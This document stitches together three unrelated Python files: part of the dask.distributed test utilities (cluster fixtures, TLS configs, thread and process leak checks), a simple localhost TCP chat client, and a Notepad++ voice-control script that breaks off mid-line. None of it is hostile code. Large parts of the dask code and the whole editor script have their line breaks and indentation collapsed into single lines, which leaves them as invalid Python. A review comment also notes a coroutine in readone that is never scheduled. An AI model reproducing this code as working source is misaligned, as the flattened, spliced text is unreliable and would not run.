        del os.environ["PYTHONASYNCIODEBUG"]


def nodebug_teardown_module(module):
    """
    A teardown_module() that you can install in a test module to reenable
    debug facilities.
    """
    if module._old_asyncio_debug is not None:
        os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug


# --- Small deterministic task functions used as workloads in tests ---


def inc(x):
    return x + 1


def dec(x):
    return x - 1


def mul(x, y):
    return x * y


def div(x, y):
    return x / y


def deep(n):
    # Recurses n levels; used to exercise deep call stacks.
    if n > 0:
        return deep(n - 1)
    else:
        return True


def throws(x):
    raise RuntimeError("hello!")


def double(x):
    return x * 2


def slowinc(x, delay=0.02):
    sleep(delay)
    return x + 1


def slowdec(x, delay=0.02):
    sleep(delay)
    return x - 1


def slowdouble(x, delay=0.02):
    sleep(delay)
    return 2 * x


def randominc(x, scale=1):
    from random import random

    sleep(random() * scale)
    return x + 1


def slowadd(x, y, delay=0.02):
    sleep(delay)
    return x + y


def slowsum(seq, delay=0.02):
    sleep(delay)
    return sum(seq)


def slowidentity(*args, **kwargs):
    # Returns its single argument, or the args tuple if several were given.
    delay = kwargs.get("delay", 0.02)
    sleep(delay)
    if len(args) == 1:
        return args[0]
    else:
        return args


def run_for(duration, timer=time):
    """
    Burn CPU for *duration* seconds.
    """
    deadline = timer() + duration
    while timer() <= deadline:
        pass


# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()


class _ModuleSlot:
    """Lazy accessor for a module-level attribute, looked up by name.

    Avoids capturing the attribute's value at pickling time (see varying()).
    """

    def __init__(self, modname, slotname):
        self.modname = modname
        self.slotname = slotname

    def get(self):
        return getattr(sys.modules[self.modname], self.slotname)


def varying(items):
    """
    Return a function that returns a result (or raises an exception)
    from *items* at each call.
    """
    # cloudpickle would serialize the *values* of all globals
    # used by *func* below, so we can't use `global <something>`.
    # Instead look up the module by name to get the original namespace
    # and not a copy.
    slot = _ModuleSlot(__name__, "_varying_dict")
    key = next(_varying_key_gen)

    def func():
        dct = slot.get()
        i = dct[key]
        if i == len(items):
            raise IndexError
        else:
            x = items[i]
            dct[key] = i + 1
            if isinstance(x, Exception):
                raise x
            else:
                return x

    return func


def map_varying(itemslists):
    """
    Like *varying*, but return the full specification for a map() call
    on multiple items lists.
    """

    def apply(func, *args, **kwargs):
        return func(*args, **kwargs)

    return apply, list(map(varying, itemslists))


async def geninc(x, delay=0.02):
    await asyncio.sleep(delay)
    return x + 1


async def asyncinc(x, delay=0.02):
    await asyncio.sleep(delay)
    return x + 1


_readone_queues = {}


async def readone(comm):
    """
    Read one message at a time from a comm that reads lists of
    messages.
    """
    try:
        q = _readone_queues[comm]
    except KeyError:
        q = _readone_queues[comm] = asyncio.Queue()

        async def background_read():
            while True:
                try:
                    messages = await comm.read()
                except CommClosedError:
                    break
                for msg in messages:
                    q.put_nowait(msg)
            # None sentinel signals the comm closed; drop the queue entry.
            q.put_nowait(None)
            del _readone_queues[comm]

        # NOTE(review): background_read is a coroutine function; calling it
        # without ensure_future/await creates a coroutine that never runs —
        # confirm this is intended (or that a scheduling wrapper is missing).
        background_read()

    msg = await q.get()
    if msg is None:
        raise CommClosedError
    else:
        return msg


def run_scheduler(q, nputs, config, port=0, **kwargs):
    """Subprocess target: run a Scheduler and put its address on *q* nputs times."""
    with dask.config.set(config):
        from distributed import Scheduler

        # On Python 2.7 and Unix, fork() is used to spawn child processes,
        # so avoid inheriting the parent's IO loop.
        with pristine_loop() as loop:

            async def _():
                scheduler = await Scheduler(
                    validate=True, host="127.0.0.1", port=port, **kwargs
                )
                for i in range(nputs):
                    q.put(scheduler.address)
                await scheduler.finished()

            try:
                loop.run_sync(_)
            finally:
                loop.close(all_fds=True)


def run_worker(q, scheduler_q, config, **kwargs):
    """Subprocess target: run a Worker against the scheduler address from *scheduler_q*."""
    with dask.config.set(config):
        from distributed import Worker

        reset_logger_locks()
        with log_errors():
            with pristine_loop() as loop:
                scheduler_addr = scheduler_q.get()

                async def _():
                    worker = await Worker(scheduler_addr, validate=True, **kwargs)
                    q.put(worker.address)
                    await worker.finished()

                try:
                    loop.run_sync(_)
                finally:
                    loop.close(all_fds=True)


def run_nanny(q, scheduler_q, config, **kwargs):
    """Subprocess target: like run_worker but supervises the worker with a Nanny."""
    with dask.config.set(config):
        with log_errors():
            with pristine_loop() as loop:
                scheduler_addr = scheduler_q.get()

                async def _():
                    worker = await Nanny(scheduler_addr, validate=True, **kwargs)
                    q.put(worker.address)
                    await worker.finished()

                try:
                    loop.run_sync(_)
                finally:
                    loop.close(all_fds=True)
@contextmanager def check_active_rpc(loop, active_rpc_timeout=1): active_before = set(rpc.active) yield # Some streams can take a bit of time to notice their peer # has closed, and keep a coroutine (*) waiting for a CommClosedError # before calling close_rpc() after a CommClosedError. # This would happen especially if a non-localhost address is used, # as Nanny does. # (*) (example: gather_from_workers()) def fail(): pytest.fail( "some RPCs left active by test: %s" % (set(rpc.active) - active_before) ) async def wait(): await async_wait_for( lambda: len(set(rpc.active) - active_before) == 0, timeout=active_rpc_timeout, fail_func=fail, ) loop.run_sync(wait) @pytest.fixture def cluster_fixture(loop): with cluster() as (scheduler, workers): yield (scheduler, workers) @pytest.fixture def s(cluster_fixture): scheduler, workers = cluster_fixture return scheduler @pytest.fixture def a(cluster_fixture): scheduler, workers = cluster_fixture return workers[0] @pytest.fixture def b(cluster_fixture): scheduler, workers = cluster_fixture return workers[1] @pytest.fixture def client(loop, cluster_fixture): scheduler, workers = cluster_fixture with Client(scheduler["address"], loop=loop) as client: yield client # Compatibility. 
A lot of tests simply use `c` as fixture name c = client @pytest.fixture def client_secondary(loop, cluster_fixture): scheduler, workers = cluster_fixture with Client(scheduler["address"], loop=loop) as client: yield client @contextmanager def tls_cluster_context( worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs ): security = security or tls_only_security() worker_kwargs = assoc(worker_kwargs or {}, "security", security) scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security) with cluster( worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs ) as (s, workers): yield s, workers @pytest.fixture def tls_cluster(loop, security): with tls_cluster_context(security=security) as (scheduler, workers): yield (scheduler, workers) @pytest.fixture def tls_client(tls_cluster, loop, security): s, workers = tls_cluster with Client(s["address"], security=security, loop=loop) as client: yield client @pytest.fixture def security(): return tls_only_security() @contextmanager def cluster( nworkers=2, nanny=False, worker_kwargs={}, active_rpc_timeout=10, disconnect_timeout=20, scheduler_kwargs={}, config={}, ): ws = weakref.WeakSet() enable_proctitle_on_children() with clean(timeout=active_rpc_timeout, threads=False) as loop: if nanny: _run_worker = run_nanny else: _run_worker = run_worker # The scheduler queue will receive the scheduler's address scheduler_q = mp_context.Queue() # Launch scheduler scheduler = mp_context.Process( name="Dask cluster test: Scheduler", target=run_scheduler, args=(scheduler_q, nworkers + 1, config), kwargs=scheduler_kwargs, ) ws.add(scheduler) scheduler.daemon = True scheduler.start() # Launch workers workers = [] for i in range(nworkers): q = mp_context.Queue() fn = "_test_worker-%s" % uuid.uuid4() kwargs = merge( { "nthreads": 1, "local_directory": fn, "memory_limit": system.MEMORY_LIMIT, }, worker_kwargs, ) proc = mp_context.Process( name="Dask cluster test: Worker", target=_run_worker, args=(q, 
scheduler_q, config), kwargs=kwargs, ) ws.add(proc) workers.append({"proc": proc, "queue": q, "dir": fn}) for worker in workers: worker["proc"].start() try: for worker in workers: worker["address"] = worker["queue"].get(timeout=5) except queue.Empty: raise pytest.xfail.Exception("Worker failed to start in test") saddr = scheduler_q.get() start = time() try: try: security = scheduler_kwargs["security"] rpc_kwargs = {"connection_args": security.get_connection_args("client")} except KeyError: rpc_kwargs = {} with rpc(saddr, **rpc_kwargs) as s: while True: nthreads = loop.run_sync(s.ncores) if len(nthreads) == nworkers: break if time() - start > 5: raise Exception("Timeout on cluster creation") # avoid sending processes down to function yield {"address": saddr}, [ {"address": w["address"], "proc": weakref.ref(w["proc"])} for w in workers ] finally: logger.debug("Closing out test cluster") loop.run_sync( lambda: disconnect_all( [w["address"] for w in workers], timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs, ) ) loop.run_sync( lambda: disconnect( saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs ) ) scheduler.terminate() scheduler_q.close() scheduler_q._reader.close() scheduler_q._writer.close() for w in workers: w["proc"].terminate() w["queue"].close() w["queue"]._reader.close() w["queue"]._writer.close() scheduler.join(2) del scheduler for proc in [w["proc"] for w in workers]: proc.join(timeout=30) with suppress(UnboundLocalError): del worker, w, proc del workers[:] for fn in glob("_test_worker-*"): with suppress(OSError): shutil.rmtree(fn) try: client = default_client() except ValueError: pass else: client.close() start = time() while any(proc.is_alive() for proc in ws): text = str(list(ws)) sleep(0.2) assert time() < start + 5, ("Workers still around after five seconds", text) async def disconnect(addr, timeout=3, rpc_kwargs=None): rpc_kwargs = rpc_kwargs or {} async def do_disconnect(): with rpc(addr, **rpc_kwargs) as w: # If the worker was killed hard 
(e.g. sigterm) during test runtime, # we do not know at this point and may not be able to connect with suppress(EnvironmentError, CommClosedError): # Do not request a reply since comms will be closed by the # worker before a reply can be made and we will always trigger # the timeout await w.terminate(reply=False) await asyncio.wait_for(do_disconnect(), timeout=timeout) async def disconnect_all(addresses, timeout=3, rpc_kwargs=None): await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses]) def gen_test(timeout=_TEST_TIMEOUT): """Coroutine test @gen_test(timeout=5) async def test_foo(): await ... # use tornado coroutines """ def _(func): def test_func(): with clean() as loop: if iscoroutinefunction(func): cor = func else: cor = gen.coroutine(func) loop.run_sync(cor, timeout=timeout) return test_func return _ async def start_cluster( nthreads, scheduler_addr, loop, security=None, Worker=Worker, scheduler_kwargs={}, worker_kwargs={}, ): s = await Scheduler( loop=loop, validate=True, security=security, port=0, host=scheduler_addr, **scheduler_kwargs, ) workers = [ Worker( s.address, nthreads=ncore[1], name=i, security=security, loop=loop, validate=True, host=ncore[0], **(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs), ) for i, ncore in enumerate(nthreads) ] # for w in workers: # w.rpc = workers[0].rpc await asyncio.gather(*workers) start = time() while len(s.workers) < len(nthreads) or any( comm.comm is None for comm in s.stream_comms.values() ): await asyncio.sleep(0.01) if time() - start > 5: await asyncio.gather(*[w.close(timeout=1) for w in workers]) await s.close(fast=True) raise Exception("Cluster creation timeout") return s, workers async def end_cluster(s, workers): logger.debug("Closing out test cluster") async def end_worker(w): with suppress(TimeoutError, CommClosedError, EnvironmentError): await w.close(report=False) await asyncio.gather(*[end_worker(w) for w in workers]) await s.close() # wait until 
scheduler stops completely s.stop() def gen_cluster( nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)], ncores=None, scheduler="127.0.0.1", timeout=_TEST_TIMEOUT, security=None, Worker=Worker, client=False, scheduler_kwargs={}, worker_kwargs={}, client_kwargs={}, active_rpc_timeout=1, config={}, clean_kwargs={}, allow_unclosed=False, ): from distributed import Client """ Coroutine test with small cluster @gen_cluster() async def test_foo(scheduler, worker1, worker2): await ... # use tornado coroutines @pytest.mark.parametrize("param", [1, 2, 3]) @gen_cluster() async def test_foo(scheduler, worker1, worker2, param): await ... # use tornado coroutines @gen_cluster() async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b): await ... # use tornado coroutines See also: start end """ if ncores is not None: warnings.warn("ncores= has moved to nthreads=", stacklevel=2) nthreads = ncores worker_kwargs = merge( {"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs ) def _(func): if not iscoroutinefunction(func): func = gen.coroutine(func) def test_func(*outer_args, **kwargs): result = None workers = [] with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop: async def coro(): with dask.config.set(config): s = False for _ in range(60): try: s, ws = await start_cluster( nthreads, scheduler, loop, security=security, Worker=Worker, scheduler_kwargs=scheduler_kwargs, worker_kwargs=worker_kwargs, ) except Exception as e: logger.error( "Failed to start gen_cluster: " f"{e.__class__.__name__}: {e}; retrying", exc_info=True, ) await asyncio.sleep(1) else: workers[:] = ws args = [s] + workers break if s is False: raise Exception("Could not start cluster") if client: c = await Client( s.address, loop=loop, security=security, asynchronous=True, **client_kwargs, ) args = [c] + args try: future = func(*args, *outer_args, **kwargs) if timeout: future = asyncio.wait_for(future, timeout) result = await future if s.validate: 
s.validate_state() finally: if client and c.status not in ("closing", "closed"): await c._close(fast=s.status == Status.closed) await end_cluster(s, workers) await asyncio.wait_for(cleanup_global_workers(), 1) try: c = await default_client() except ValueError: pass else: await c._close(fast=True) def get_unclosed(): return [c for c in Comm._instances if not c.closed()] + [ c for c in _global_clients.values() if c.status != "closed" ] try: start = time() while time() < start + 60: gc.collect() if not get_unclosed(): break await asyncio.sleep(0.05) else: if allow_unclosed: print(f"Unclosed Comms: {get_unclosed()}") else: raise RuntimeError("Unclosed Comms", get_unclosed()) finally: Comm._instances.clear() _global_clients.clear() return result result = loop.run_sync( coro, timeout=timeout * 2 if timeout else timeout ) for w in workers: if getattr(w, "data", None): try: w.data.clear() except EnvironmentError: # zict backends can fail if their storage directory # was already removed pass del w.data return result # Patch the signature so pytest can inject fixtures orig_sig = inspect.signature(func) args = [None] * (1 + len(nthreads)) # scheduler, *workers if client: args.insert(0, None) bound = orig_sig.bind_partial(*args) test_func.__signature__ = orig_sig.replace( parameters=[ p for name, p in orig_sig.parameters.items() if name not in bound.arguments ] ) return test_func return _ def raises(func, exc=Exception): try: func() return False except exc: return True def terminate_process(proc): if proc.poll() is None: if sys.platform.startswith("win"): proc.send_signal(signal.CTRL_BREAK_EVENT) else: proc.send_signal(signal.SIGINT) try: proc.wait(10) finally: # Make sure we don't leave the process lingering around with suppress(OSError): proc.kill() @contextmanager def popen(args, **kwargs): kwargs["stdout"] = subprocess.PIPE kwargs["stderr"] = subprocess.PIPE if sys.platform.startswith("win"): # Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT kwargs["creationflags"] = 
subprocess.CREATE_NEW_PROCESS_GROUP dump_stdout = False args = list(args) if sys.platform.startswith("win"): args[0] = os.path.join(sys.prefix, "Scripts", args[0]) else: args[0] = os.path.join( os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0] ) proc = subprocess.Popen(args, **kwargs) try: yield proc except Exception: dump_stdout = True raise finally: try: terminate_process(proc) finally: # XXX Also dump stdout if return code != 0 ? out, err = proc.communicate() if dump_stdout: print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0]) print(err.decode()) print("\n\nPrint from stdout\n=================\n") print(out.decode()) def wait_for_port(address, timeout=5): assert isinstance(address, tuple) deadline = time() + timeout while True: timeout = deadline - time() if timeout < 0: raise RuntimeError("Failed to connect to %s" % (address,)) try: sock = socket.create_connection(address, timeout=timeout) except EnvironmentError: pass else: sock.close() break def wait_for(predicate, timeout, fail_func=None, period=0.001): deadline = time() + timeout while not predicate(): sleep(period) if time() > deadline: if fail_func is not None: fail_func() pytest.fail("condition not reached until %s seconds" % (timeout,)) async def async_wait_for(predicate, timeout, fail_func=None, period=0.001): deadline = time() + timeout while not predicate(): await asyncio.sleep(period) if time() > deadline: if fail_func is not None: fail_func() pytest.fail("condition not reached until %s seconds" % (timeout,)) @memoize def has_ipv6(): """ Return whether IPv6 is locally functional. This doesn't guarantee IPv6 is properly configured outside of localhost. 
""" if os.getenv("DISABLE_IPV6") == "1": return False serv = cli = None try: serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) serv.bind(("::", 0)) serv.listen(5) cli = socket.create_connection(serv.getsockname()[:2]) except EnvironmentError: return False else: return True finally: if cli is not None: cli.close() if serv is not None: serv.close() if has_ipv6(): def requires_ipv6(test_func): return test_func else: requires_ipv6 = pytest.mark.skip("ipv6 required") async def assert_can_connect(addr, timeout=0.5, **kwargs): """ Check that it is possible to connect to the distributed *addr* within the given *timeout*. """ comm = await connect(addr, timeout=timeout, **kwargs) comm.abort() async def assert_cannot_connect( addr, timeout=0.5, exception_class=EnvironmentError, **kwargs ): """ Check that it is impossible to connect to the distributed *addr* within the given *timeout*. """ with pytest.raises(exception_class): comm = await connect(addr, timeout=timeout, **kwargs) comm.abort() async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs): """ Check that the local *port* is reachable from all IPv4 and IPv6 addresses. """ futures = [ assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs), assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs), ] if has_ipv6(): futures += [ assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs), assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs), ] await asyncio.gather(*futures) async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs): """ Check that the local *port* is reachable from all IPv4 addresses. 
""" futures = [ assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs), assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs), ] if has_ipv6(): futures += [ assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs), assert_cannot_connect( "%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs ), ] await asyncio.gather(*futures) async def assert_can_connect_locally_4(port, **kwargs): """ Check that the local *port* is only reachable from local IPv4 addresses. """ futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)] if get_ip() != "127.0.0.1": # No outside IPv4 connectivity? futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)] if has_ipv6(): futures += [ assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs), assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs), ] await asyncio.gather(*futures) async def assert_can_connect_from_everywhere_6(port, **kwargs): """ Check that the local *port* is reachable from all IPv6 addresses. """ assert has_ipv6() futures = [ assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs), assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs), assert_can_connect("tcp://[::1]:%d" % port, **kwargs), assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs), ] await asyncio.gather(*futures) async def assert_can_connect_locally_6(port, **kwargs): """ Check that the local *port* is only reachable from local IPv6 addresses. """ assert has_ipv6() futures = [ assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs), assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs), assert_can_connect("tcp://[::1]:%d" % port, **kwargs), ] if get_ipv6() != "::1": # No outside IPv6 connectivity? 
futures += [ assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs) ] await asyncio.gather(*futures) @contextmanager def captured_logger(logger, level=logging.INFO, propagate=None): """Capture output from the given Logger.""" if isinstance(logger, str): logger = logging.getLogger(logger) orig_level = logger.level orig_handlers = logger.handlers[:] if propagate is not None: orig_propagate = logger.propagate logger.propagate = propagate sio = io.StringIO() logger.handlers[:] = [logging.StreamHandler(sio)] logger.setLevel(level) try: yield sio finally: logger.handlers[:] = orig_handlers logger.setLevel(orig_level) if propagate is not None: logger.propagate = orig_propagate @contextmanager def captured_handler(handler): """Capture output from the given logging.StreamHandler.""" assert isinstance(handler, logging.StreamHandler) orig_stream = handler.stream handler.stream = io.StringIO() try: yield handler.stream finally: handler.stream = orig_stream @contextmanager def new_config(new_config): """ Temporarily change configuration dictionary. """ from .config import defaults config = dask.config.config orig_config = copy.deepcopy(config) try: config.clear() config.update(copy.deepcopy(defaults)) dask.config.update(config, new_config) initialize_logging(config) yield finally: config.clear() config.update(orig_config) initialize_logging(config) @contextmanager def new_environment(changes): saved_environ = os.environ.copy() os.environ.update(changes) try: yield finally: os.environ.clear() os.environ.update(saved_environ) @contextmanager def new_config_file(c): """ Temporarily change configuration file to match dictionary *c*. 
""" import yaml old_file = os.environ.get("DASK_CONFIG") fd, path = tempfile.mkstemp(prefix="dask-config") try: with os.fdopen(fd, "w") as f: f.write(yaml.dump(c)) os.environ["DASK_CONFIG"] = path try: yield finally: if old_file: os.environ["DASK_CONFIG"] = old_file else: del os.environ["DASK_CONFIG"] finally: os.remove(path) certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests")) def get_cert(filename): """ Get the path to one of the test TLS certificates. """ path = os.path.join(certs_dir, filename) assert os.path.exists(path), path return path def tls_config(): """ A functional TLS configuration with our test certs. """ ca_file = get_cert("tls-ca-cert.pem") keycert = get_cert("tls-key-cert.pem") return { "distributed": { "comm": { "tls": { "ca-file": ca_file, "client": {"cert": keycert}, "scheduler": {"cert": keycert}, "worker": {"cert": keycert}, } } } } def tls_only_config(): """ A functional TLS configuration with our test certs, disallowing plain TCP communications. """ c = tls_config() c["distributed"]["comm"]["require-encryption"] = True return c def tls_security(): """ A Security object with proper TLS configuration. """ with new_config(tls_config()): sec = Security() return sec def tls_only_security(): """ A Security object with proper TLS configuration and disallowing plain TCP communications. 
""" with new_config(tls_only_config()): sec = Security() assert sec.require_encryption return sec def get_server_ssl_context( certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem" ): ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file)) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile)) return ctx def get_client_ssl_context( certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem" ): ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file)) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile)) return ctx def bump_rlimit(limit, desired): resource = pytest.importorskip("resource") try: soft, hard = resource.getrlimit(limit) if soft < desired: resource.setrlimit(limit, (desired, max(hard, desired))) except Exception as e: pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e)) def gen_tls_cluster(**kwargs): kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)]) return gen_cluster( scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs ) @contextmanager def save_sys_modules(): old_modules = sys.modules old_path = sys.path try: yield finally: for i, elem in enumerate(sys.path): if elem not in old_path: del sys.path[i] for elem in sys.modules.keys(): if elem not in old_modules: del sys.modules[elem] @contextmanager def check_thread_leak(): """Context manager to ensure we haven't leaked any threads""" active_threads_start = threading.enumerate() yield start = time() while True: bad_threads = [ thread for thread in threading.enumerate() if thread not in active_threads_start and "Threaded" not in thread.name and "watch message" not in thread.name and "TCP-Executor" not in thread.name # TODO: Make sure profile thread is cleaned up # and remove the line below and "Profile" not in thread.name ] 
if not bad_threads: break else: sleep(0.01) if time() > start + 5: # Raise an error with information about leaked threads from distributed import profile bad_thread = bad_threads[0] call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident]) assert False, (bad_thread, call_stacks) @contextmanager def check_process_leak(check=True): for proc in mp_context.active_children(): proc.terminate() yield if check: for i in range(200): if not set(mp_context.active_children()): break else: sleep(0.2) else: assert not mp_context.active_children() for proc in mp_context.active_children(): proc.terminate() @contextmanager def check_instances(): Client._instances.clear() Worker._instances.clear() Scheduler._instances.clear() SpecCluster._instances.clear() Worker._initialized_clients.clear() # assert all(n.status == "closed" for n in Nanny._instances), { # n: n.status for n in Nanny._instances # } Nanny._instances.clear() _global_clients.clear() Comm._instances.clear() yield start = time() while set(_global_clients): sleep(0.1) assert time() < start + 10 _global_clients.clear() for w in Worker._instances: with suppress(RuntimeError): # closed IOLoop w.loop.add_callback(w.close, report=False, executor_wait=False) if w.status == Status.running: w.loop.add_callback(w.close) Worker._instances.clear() start = time() while any(c.status != "closed" for c in Worker._initialized_clients): sleep(0.1) assert time() < start + 10 Worker._initialized_clients.clear() for i in range(5): if all(c.closed() for c in Comm._instances): break else: sleep(0.1) else: L = [c for c in Comm._instances if not c.closed()] Comm._instances.clear() print("Unclosed Comms", L) # raise ValueError("Unclosed Comms", L) assert all( n.status == Status.closed or n.status == Status.init for n in Nanny._instances ), {n: n.status for n in Nanny._instances} # assert not list(SpecCluster._instances) # TODO assert all(c.status == Status.closed for c in SpecCluster._instances), list( SpecCluster._instances ) 
SpecCluster._instances.clear() Nanny._instances.clear() DequeHandler.clear_all_instances() @contextmanager def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True): with check_thread_leak() if threads else nullcontext(): with pristine_loop() as loop: with check_process_leak(check=processes): with check_instances() if instances else nullcontext(): with check_active_rpc(loop, timeout): reset_config() dask.config.set({"distributed.comm.timeouts.connect": "5s"}) # Restore default logging levels # XXX use pytest hooks/fixtures instead? for name, level in logging_levels.items(): logging.getLogger(name).setLevel(level) yield loop with suppress(AttributeError): del thread_state.on_event_loop_thread @pytest.fixture def cleanup(): with clean(): yield class TaskStateMetadataPlugin(WorkerPlugin): """WorkPlugin to populate TaskState.metadata""" def setup(self, worker): self.worker = worker def transition(self, key, start, finish, **kwargs): ts = self.worker.tasks[key] if start == "ready" and finish == "executing": ts.metadata["start_time"] = time() elif start == "executing" and finish == "memory": ts.metadata["stop_time"] = time()
client.py
# Simple line-based TCP chat client: one thread prints everything the
# server sends, another forwards stdin lines prefixed with our nickname.
import socket
import threading

# Choosing Nickname
nickname = input("Choose your nickname: ")

# Connecting To Server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 55555))


def receive():
    """Print messages from the server forever; answer the 'NICK' handshake.

    Closes the socket and returns on connection loss or decode failure.
    """
    while True:
        try:
            message = client.recv(1024).decode('ascii')
            if not message:
                # BUG FIX: recv() returns '' once the server closes the
                # connection; the original looped forever printing blanks.
                print("Connection closed by server.")
                client.close()
                break
            if message == 'NICK':
                # Server is asking who we are; reply with our nickname.
                client.send(nickname.encode('ascii'))
            else:
                print(message)
        except (OSError, UnicodeDecodeError):
            # BUG FIX: narrowed from a bare `except:` so KeyboardInterrupt
            # and programming errors are not silently swallowed.
            # Also fixes the "occured" typo in the user-facing message.
            print("An error occurred!")
            client.close()
            break


def write():
    """Read lines from stdin and send them as '<nickname>: <text>'."""
    while True:
        message = '{}: {}'.format(nickname, input(''))
        client.send(message.encode('ascii'))


# Starting Threads For Listening And Writing
receive_thread = threading.Thread(target=receive)
receive_thread.start()

write_thread = threading.Thread(target=write)
write_thread.start()
npp_dragonfly.py
import subprocess; import threading; from threading import Thread; import time; import sys; import os; import re; import jellyfish; import lxml; from lxml import etree; import sqlite3; import traceback; import socket from fuzzy_string_comparison import get_closest_match; import win32clipboard; try: import tinycss; except: pass; def set_cb(t): win32clipboard.OpenClipboard(); win32clipboard.EmptyClipboard(); win32clipboard.SetClipboardData(1,t); win32clipboard.CloseClipboard(); def get_cb(): win32clipboard.OpenClipboard(); r = win32clipboard.GetClipboardData(); win32clipboard.CloseClipboard(); return r; def get_dirname(fn): tf = fn.rfind("/"); tf2 = fn.rfind("\\"); if(tf2 > tf): tf = tf2; if(tf == -1): return ""; dir = fn[0:tf]; return dir; current_lang = "python"; dm = {}; icb_max = 5; cb_buff = 0; cb_page_default = "default"; cb_page = cb_page_default; cb_page_auto_detect = True; cb_page_map = {}; cb_page_bmap = {}; cb_list_flag = -1; internal_cb = [""] * icb_max; paste_port = 36555; cmd_port = 36556; paste_send_port = 35555; cmd_send_port = 35556; rcv_port_list = [paste_port,cmd_port]; global dsep; dsep = "###<<<>>>###"; global serv_path; serv_path = ""; try: serv_path = os.environ["NPP_DRAGON"]; except: print "NPP_DRAGON ENVIRONMENTAL VARIABLE ISN'T SETUP"; exit(); raw = "python"; try: with open(serv_path+"\\grammar\\context.txt","r+") as f: raw = f.read(); raw.replace("\n","").replace("\r","").replace("\t","").replace(" ","").lower(); except: pass; current_lang = raw; global ed; ed = editor; global mark_time; mark_time = int(time.time()); global is_running; is_running = True; global esep; esep = "###!!||!!###"; auto_lang = True; # r = re.compile(r'[0-9_]*[a-zA-Z]+[0-9_]*'); global action_map; action_map = {}; def cur_line_num(ed): cpos = ed.getCurrentPos(); lc = ed.getLineCount(); ln = 0; for i in range(0,lc): le = ed.getLineEndPosition(i); ln = i; if(le >= cpos): return ln; return ln; def backspace(x=1): global ed; for i in range(0,x): ed.deleteBack(); 
action_map["backspace"] = backspace; def move_left(x=1): global ed; tpos = int(ed.getCurrentPos()); tpos -= x; if(tpos < 0): tpos = 0; ed.gotoPos(tpos); action_map["left"] = move_left; def move_right(x=1): global ed; tpos = int(ed.getCurrentPos()); tpos += x; ed.gotoPos(tpos); action_map["right"] = move_right; def move_up(x=1): global ed; for i in range(0,x): ed.lineUp(); action_map["up"] = move_up; def move_down(x=1): global ed; for i in range(0,x): ed.lineDown(); action_map["down"] = move_down; def doc_top(x=1): global ed; ed.documentStart(); action_map["doc_top"] = doc_top; def doc_bot(x=1): global ed; ed.documentEnd(); action_map["doc_bot"] = doc_bot; def line_start(x=1): global ed; cln = cur_line_num(ed); cln -= 1; tpos = 0; if(cln > 0): tpos = ed.getLineEndPosition(cln) + 2; ed.gotoPos(tpos); action_map["line_start"] = line_start; def line_end(x=1): global ed; ed.lineEnd(); action_map["line_end"] = line_end; def container_nav(x=1,type=0,direction=0,targ="(",targ2=")"): global ed; tlen = int(Editor.getTextLength(ed)); tpos = int(ed.getCurrentPos()); txt = ""; p = -1; if(direction == 1): # Right txt = Editor.getTextRange(editor,tpos,tlen); y = 0 #Console.write(console,"LEN: "+str(len(txt))+"\n"); for i in range(0,x): y = txt.find(targ,y); if(y != -1): p = y; y += len(targ); p += tpos; #Console.write(console,"pos: "+str(p)+"\n\n"); elif(direction == 0): # Left txt = Editor.getTextRange(editor,0,tpos); y = len(txt); for i in range(0,x): y = txt[:y].rfind(targ); if(y != -1): p = y; #Console.write(console,"type: 